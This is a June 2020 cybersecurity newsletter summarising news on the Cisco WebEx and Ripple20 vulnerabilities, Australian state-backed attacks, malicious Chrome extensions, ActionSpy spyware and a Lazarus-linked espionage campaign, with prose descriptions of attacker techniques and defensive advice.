Cyber Pulse: Edition 117 | 22 June 2020

Here is our cyber security round-up of the week:

Cisco WebEx vulnerability allows attackers to gain access to sensitive information

A flaw in Cisco Webex Meetings desktop app for Windows released earlier than 40.6.0, tracked as CVE-2020-3347, could allow local authenticated attackers to gain access to sensitive information on an affected system by Cisco, the company reported. An attacker with permissions to view system memory could exploit this vulnerability by running an application on the local system, which is designed to read shared memory, and retrieve usernames, meeting information or authentication tokens that could aid the attacker in future attacks.

The app uses shared memory in an unsafe way to exchange information with the underlying Windows OS and other apps on the system. “Once the application is installed, it adds a tray app that is started once a user logs on and has some dependent processes launched as well at that time. If a user has configured the client to log in automatically (default case), the following applies,” reads a post published by researchers who reported the issue.

An attacker could also use the stolen information to access the victim’s WebEx account. Cisco has already addressed the vulnerability with the release of Cisco Webex Meetings Desktop App for Windows releases 40.6.0 and later (versions 39.5.26 and later for lockdown versions). The company informed its users that there are no available workarounds at the moment. The good news is that Cisco is not aware of public reports or malicious use of this vulnerability.

Also read: 6 Cisco back-end servers hacked.

Ripple20 vulnerabilities in IoT supply chains

Researchers have discovered 19 vulnerabilities in a low-level TCP/IP software library used by "hundreds of millions" of IoT devices. The code was developed by the Ohio-based company Treck and has been integrated into the IoT supply chain since its release in the late 1990s. The set of flaws, dubbed "Ripple20", includes four remote code execution vulnerabilities, two of which received CVSS scores of 10. Treck has developed patches for the flaws and urges its customers to contact them for more information, noting that the level of exposure to the vulnerabilities varies greatly from product to product.

The real challenge, however, is the fact that many IoT vendors likely don't know if their products contain the vulnerable code. JSOF collaborated with CERT/CC to track down "as many affected vendors as possible before the vulnerabilities became public," but there are many others whose status is still unknown. The researchers state, "Affected vendors range from one-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, Baxter, as well as many other major international vendors suspected of being of vulnerable in medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries."

CISA and CERT/CC lay out mitigations to minimise the risk of exploitation, and JSOF is offering a script that can help in some cases to determine whether a device is vulnerable. But despite these efforts, these vulnerabilities will haunt the IoT landscape for years to come.

Also read: IoT ‘dark_nexus’ botnet emerging​

Australia warns of state-backed cyberattacks

Australia's Prime Minister Scott Morrison stated Friday that Australia is being targeted by a sophisticated, state-sponsored cyber actor "across a range of sectors, including all levels of government, industry, political organisations, education, health, essential service providers and operators of other critical infrastructure." Morrison noted that these attacks aren't new, but they're growing increasingly frequent. He declined to publicly attribute the activity to any specific nation-state, but noted that "there are not a large number of state-based actors that can engage in this type of activity and it is clear, based on the advice that we have received, that this has been done by a state-based actor with very, very significant capabilities."

The ASD's Australian Cyber Security Centre (ACSC) published an advisory on Thursday outlining the threat actor's tactics, techniques and procedures, and observers including the Guardian noted that, while the attacker may be sophisticated, the techniques themselves aren't particularly novel or advanced. The actor prefers to use open-source exploits against public-facing infrastructure. If that approach fails, the attackers turn to spear-phishing.

The ACSC's two key recommendations for organisations are obvious but important: patch internet-facing infrastructure promptly, and use multi-factor authentication for all remote access services.

Google recently removed 106 more extensions from its Chrome Web Store

Google recently removed 106 more extensions from its Chrome Web Store after they were found illegally collecting sensitive user data as part of a "massive global surveillance campaign" targeting oil and gas, finance, and healthcare sectors. Researchers disclosed the findings late last week, stating the malicious browser add-ons were tied back to a single internet domain registrar, GalComm. However, it's not immediately clear who is behind the spyware effort. This campaign and the Chrome extensions involved performed operations such as taking screenshots of the victim device, loading malware, reading the clipboard, and actively harvesting tokens and user input.

The extensions in question posed as utilities offering capabilities to convert files from one format to the other, among other tools for secure browsing, while relying on thousands of fake reviews to trick unsuspecting users into installing them. In total, the extensions were downloaded nearly 33 million times over the course of three months before researchers reached out to Google in May. The search giant, in response to the disclosures, has deactivated the problematic browser extensions. The full list of offending extension IDs can be accessed here.

Deceptive extensions on the Chrome Web Store have continued to be a problem, with bad actors exploiting it for malvertising and other data-stealing campaigns. Google have previously removed 500 malware-ridden extensions after they were caught serving adware and sending users' browsing activity to attacker-controlled servers. Then in April, the company yanked another set of 49 extensions that masqueraded as cryptocurrency wallets to steal Keystore information.

It's recommended that users review extension permissions by visiting "chrome://extensions" on the Chrome browser, consider uninstalling those that are rarely used, or switch to other software alternatives that don't require invasive access to browser activity.

Android spyware targets Uyghur Muslims

Researchers have discovered a previously undocumented Android spyware strain that's targeting Tibet, Turkey, and Taiwan, with a particular focus on Uyghur Muslims. The researchers have dubbed the malware "ActionSpy" and they've tied it to the China-associated Earth Empusa APT (also known as POISON CARP or Evil Eye).

The group is using watering-hole tactics and phishing attacks to lure victims to spoofed websites that will install the malware. The researchers note that these tactics are similar to those used in Operation Poisoned News, another recent campaign that targeted iOS users in Hong Kong. The ActionSpy malware is related to a series of watering-hole attacks discovered by Google last year that used five iOS exploit chains to compromise visitors' phones.

Sophisticated cyber-espionage campaign directed against aerospace and military

Cybersecurity researchers today took the wraps off a new sophisticated cyber-espionage campaign directed against aerospace and military organisations in Europe and the Middle East, with an aim to spy on key employees of the targeted firms and, in some case, even to siphon money. The campaign, dubbed "Operation In(ter)ception" because of a reference to "Inception" in the malware sample, took place between September to December 2019.

The primary goal of the operation was espionage. However, in one of the cases we investigated, the attackers tried to monetise access to a victim's email account through a business email compromise (BEC) attack as the final stage of the operation. The financial motivation behind the attacks, coupled with similarities in targeting and development environment, have led ESET to suspect Lazarus Group, a notorious hacking group that's been attributed to working on behalf of the North Korean government to fund the country's illicit weapon and missile programs.

Also read: How hackers can hack a plane

Researchers said this campaign was highly targeted and relied on social engineering tricks to lure employees working for the chosen companies with fake job offers using LinkedIn's messaging feature, posing as HR managers of well-known companies in the aerospace and defence industry, including Collins Aerospace and General Dynamics. Once the contact was established, the attackers snuck malicious files into the communication, disguising them as documents related to the advertised job offer, with two of the affected European companies.

The decoy RAR archive files, which were directly sent over the chats or as emails sent from their fake LinkedIn personas pointing to an OneDrive link, purported to contain a PDF document detailing salary information of specific job positions, when in actuality, it executed Windows' Command Prompt utility to perform a series of actions:

• copy Windows Management Instrumentation command-line tool (wmic.exe) to a specific folder,
• rename it to something innocuous to evade detection (e.g., Intel, NVidia, Skype, OneDrive and Mozilla), and
• create scheduled tasks that execute a remote XSL script via WMIC.

Upon gaining an initial foothold inside the target company, the threat actors went on to employ a custom malware downloader, which in turn downloaded a previously undocumented second-stage payload — a C++ backdoor that periodically sends requests to an attacker-controlled server, carry out pre-defined actions based on the received commands, and exfiltrate the collected information as a RAR file via a modified version of dbxcli, an open-source command-line client for Dropbox.

In addition to using WMIC to interpret remote XSL scripts, the adversaries also abused native Windows utilities such as "certutil" to decode base64-encoded downloaded payloads, and "rundll32" and "regsvr32" to run their custom malware.

"We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don't wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies," said Paul Rockwell, Head of Trust and Safety at LinkedIn, in response.

Edited and compiled by QA's Director of Cyber, Richard Beck.

Subscribe to our weekly Cyber Pulse newsletter below.

Click here to find out about QA's extensive cyber security courses.